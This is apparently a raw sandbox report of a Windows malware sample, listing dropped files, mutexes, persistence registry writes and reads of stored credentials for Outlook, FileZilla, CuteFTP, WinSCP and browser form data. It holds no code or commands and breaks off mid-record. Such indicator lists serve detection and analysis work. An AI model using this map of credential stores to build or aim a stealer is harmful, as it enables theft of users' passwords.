c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe exe File users\aetadzjz\appdata\local\temp\upde25b4796.exe users\aetadzjz\appdata\local\temp\upde25b4796.exe c:\ c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe exe MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\microsoft onedrive.rig c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash 
da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb08d.tmp users\aetadzjz\appdata\local\temp\cabb08d.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb08e.tmp users\aetadzjz\appdata\local\temp\cabb08e.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb08f.tmp users\aetadzjz\appdata\local\temp\cabb08f.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb090.tmp users\aetadzjz\appdata\local\temp\cabb090.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb090.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb091.tmp users\aetadzjz\appdata\local\temp\cabb091.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb091.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol c:\ c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol sol File 
users\aetadzjz\appdata\local\temp\cabb092.tmp users\aetadzjz\appdata\local\temp\cabb092.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb092.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb0a3.tmp users\aetadzjz\appdata\local\temp\cabb0a3.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb0a3.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\flab08c.tmp users\aetadzjz\appdata\local\temp\flab08c.tmp c:\ c:\users\aetadzjz\appdata\local\temp\flab08c.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb0a4.tmp users\aetadzjz\appdata\local\temp\cabb0a4.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb0a4.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb0a5.tmp users\aetadzjz\appdata\local\temp\cabb0a5.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb0a5.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\cabb0a6.tmp users\aetadzjz\appdata\local\temp\cabb0a6.tmp c:\ c:\users\aetadzjz\appdata\local\temp\cabb0a6.tmp tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 File users\aetadzjz\appdata\local\temp\sofb0d5.tmp users\aetadzjz\appdata\local\temp\sofb0d5.tmp c:\ c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp 
tmp MD5 d41d8cd98f00b204e9800998ecf8427e SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Mutex 61AB4C4AE08220DC5911D67B8EFCF107 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex D3F6CAB61E96B029AD170EEF2C2F89C2 Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex 61AB4C4AE08220DC5911D67B8EFCF107 Mutex 61AB4C4AE08220DC5911D67B8EFCF107 Mutex F063546A5853AF5508DB5A15751DB34A Mutex ABC6B5B774FF9FD7F54EC277098C64EE Mutex F063546A5853AF5508DB5A15751DB34A Mutex ABC6B5B774FF9FD7F54EC277098C64EE WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey Software\Mozilla HKEY_CURRENT_USER WinRegistryKey Software\Mozilla\Firefox 
HKEY_CURRENT_USER PathToExe WinRegistryKey Software\Mozilla\Firefox\Crash Reporter HKEY_CURRENT_USER PathToExe WinRegistryKey Software\Mozilla\Firefox\TaskBarIDs HKEY_CURRENT_USER PathToExe WinRegistryKey Software\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Firefox\TaskBarIDs HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Firefox\TaskBarIDs HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox\25.0 (en-US) HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox\25.0 (en-US) HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main HKEY_LOCAL_MACHINE PathToExe PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0\bin HKEY_LOCAL_MACHINE PathToExe PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0\extensions HKEY_LOCAL_MACHINE PathToExe WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0\extensions HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Identities HKEY_CURRENT_USER WinRegistryKey Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Account Manager HKEY_LOCAL_MACHINE Outlook WinRegistryKey Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 
HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 HKEY_CURRENT_USER WinRegistryKey 
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER Email Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 HKEY_CURRENT_USER Email WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Windows Mail HKEY_CURRENT_USER Salt WinRegistryKey Software\Microsoft\Windows Live Mail HKEY_CURRENT_USER WinRegistryKey Software\Mozilla HKEY_CURRENT_USER WinRegistryKey Software\Mozilla\Firefox HKEY_CURRENT_USER WinRegistryKey Software\Mozilla HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox HKEY_LOCAL_MACHINE WinRegistryKey Software\Mozilla\Mozilla Firefox 25.0 HKEY_LOCAL_MACHINE WinRegistryKey Software\Martin Prikryl HKEY_CURRENT_USER WinRegistryKey Software\Martin Prikryl HKEY_LOCAL_MACHINE WinRegistryKey Software\Ghisler\Windows Commander HKEY_CURRENT_USER WinRegistryKey Software\Ghisler\Total Commander HKEY_CURRENT_USER WinRegistryKey Software\Ghisler\Windows Commander HKEY_LOCAL_MACHINE WinRegistryKey Software\Ghisler\Total Commander HKEY_LOCAL_MACHINE WinRegistryKey Software\FileZilla HKEY_CURRENT_USER WinRegistryKey Software\FileZilla Client HKEY_CURRENT_USER WinRegistryKey Software\FileZilla HKEY_LOCAL_MACHINE WinRegistryKey Software\FileZilla Client HKEY_LOCAL_MACHINE WinRegistryKey Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar HKEY_CURRENT_USER 
WinRegistryKey Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\GlobalSCAPE\CuteFTP 9\QCToolbar HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\IntelliForms\FormData HKEY_CURRENT_USER WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player Plugin HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 25.0 (x86 en-US) HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey 
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMRayVMTools HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey 
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F03217071FF} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3c3aafc8-d898-43ec-998f-965ffdae065a} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{582EA838-9199-3518-A05C-DB09462F68EC} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{68306422-7C57-373F-8860-D26CE4BA2A15} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey 
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AA0000000001} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e52a6842-b0ac-476e-b48f-378a97a67346} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{e6e75766-da0f-4ba2-9788-6ea593ce702d} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey 
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 HKEY_LOCAL_MACHINE UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573 HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} HKEY_LOCAL_MACHINE UninstallString UninstallString WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Eteg WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey 
SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Omegovna WinRegistryKey SOFTWARE\Microsoft\Acuhci HKEY_CURRENT_USER Baywkivyl WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP User WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER SMTP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER POP3 Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 HKEY_CURRENT_USER IMAP Password WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER SMTP Server SMTP Server WinRegistryKey Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 HKEY_CURRENT_USER POP3 Server POP3 Server WinRegistryKey 